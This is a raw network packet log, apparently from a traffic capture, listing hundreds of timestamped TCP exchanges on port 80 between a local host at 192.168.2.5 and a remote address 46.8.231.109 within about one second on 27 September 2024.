Sep 27, 2024 00:15:07.596637964 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.596654892 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.596700907 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.596704960 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.596715927 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.596760035 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.596760035 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.596788883 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.596800089 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.596811056 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.596822023 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.596832991 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.596862078 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.596862078 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.596882105 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.596921921 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.596934080 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.596945047 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.596956015 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.596966982 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.596966982 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.596987009 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.597014904 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.597064972 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.597075939 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.597085953 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.597096920 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.597106934 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.597126961 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.597127914 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.597166061 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.597239017 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.597249985 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.597260952 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.597306967 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.597306967 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.597325087 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.597337961 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.597347975 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.597358942 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.597371101 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.597390890 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.597409964 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.597414970 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.597420931 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.597460985 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.597460985 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.597486019 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.597497940 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.597510099 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.597537041 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.597537041 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.597556114 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.597757101 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.597767115 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.597778082 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.597793102 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.597803116 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.597812891 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.597815037 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.597815037 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.597842932 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.597922087 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.681035995 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.681056023 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.681066990 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.681077003 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.681087971 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.681097984 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.681101084 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.681108952 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.681122065 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.681174040 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.681236029 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.681246042 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.681256056 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.681266069 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.681276083 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.681279898 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.681287050 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.681298018 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.681310892 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.681366920 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.681375027 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.681385994 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.681422949 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.681452036 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.681499004 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.681509018 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.681519032 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.681529045 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.681539059 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.681541920 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.681549072 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.681555033 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.681560040 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.681576014 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.681603909 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.681674957 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.681685925 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.681695938 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.681705952 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.681711912 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.681718111 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.681725979 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.681775093 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.681817055 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.681907892 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.681919098 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.681929111 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.681938887 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.681943893 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.681953907 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.681958914 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.681963921 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.681974888 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.681984901 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.681993961 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.681998968 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.682003975 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.682008982 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.682014942 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.682034016 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.682034016 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.682048082 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.682071924 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.682154894 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.682197094 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.682312012 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.682322025 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.682332039 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.682337046 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.682348013 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.682353020 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.682363033 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.682373047 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.682379007 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.682379007 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.682384014 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.682389021 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.682399988 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.682406902 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.682410955 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.682420969 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.682431936 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.682435036 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.682441950 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.682446957 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.682447910 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.682466984 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.682477951 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.682507992 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.682531118 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.682917118 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.682928085 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.682938099 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.682948112 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.682956934 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.682969093 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.682984114 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.683017015 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.683199883 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.683209896 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.683221102 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.683229923 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.683240891 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.683257103 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.683257103 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.683290958 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.773509979 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.780689001 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.947653055 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.947665930 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.947676897 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.947702885 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.947714090 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.947726011 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.947737932 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.947758913 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.947793007 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.947798967 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.947808027 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.947838068 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.947849035 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.947851896 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.947877884 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.947901964 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.947923899 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.947940111 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.947952032 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.947962046 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.947962999 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.947972059 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.947981119 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.948000908 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.948132038 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.948143959 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.948153973 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.948164940 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.948179007 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.948194027 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.948200941 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.948210955 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.948211908 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.948221922 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.948239088 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.948265076 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.948309898 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.948321104 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.948331118 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.948342085 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.948352098 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.948354006 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.948388100 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.948957920 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.948970079 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.948980093 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.948985100 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.948996067 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.949007034 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.949018002 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.949028015 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.949033976 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.949034929 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.949079990 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.949079990 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.949089050 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.949100018 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.949100971 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.949110985 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.949122906 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.949140072 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.949162006 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.949256897 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.949269056 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.949279070 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.949289083 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.949300051 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.949301958 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.949311018 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.949321032 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.949330091 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.949331999 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.949341059 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.949351072 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.949361086 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.949364901 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.949372053 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.949381113 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.949388981 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.949392080 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.949403048 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.949404001 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.949421883 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.949450970 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.949480057 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.949491024 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.949501038 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.949512005 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.949522972 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.949526072 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.949532986 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.949543953 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.949553967 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.949563980 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.949573040 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.949584007 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.949590921 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.949594021 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.949604988 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.949615955 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.949619055 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.949619055 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.949636936 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.949636936 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.949649096 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.949763060 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.949774027 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.949784994 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.949790955 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.949800014 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.949810982 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.949821949 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.949825048 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.949834108 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.949837923 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.949846029 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.949866056 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.949891090 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.950002909 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.950014114 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.950023890 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.950035095 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.950045109 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.950046062 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.950052023 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.950062037 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.950067043 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.950076103 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.950078964 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.950088978 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.950099945 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.950107098 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.950109959 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.950123072 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.950140953 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.950155973 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.950314045 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.950325012 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.950335026 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.950346947 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.950356960 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.950367928 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.950371981 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.950377941 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.950381994 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.950390100 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.950390100 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.950401068 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.950411081 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.950423002 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.950431108 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.950442076 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.950453043 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.950455904 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.950464964 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.950474024 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.950475931 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.950486898 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.950496912 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.950504065 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.950509071 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.950524092 CEST	80	49708	46.8.231.109	192.168.2.5
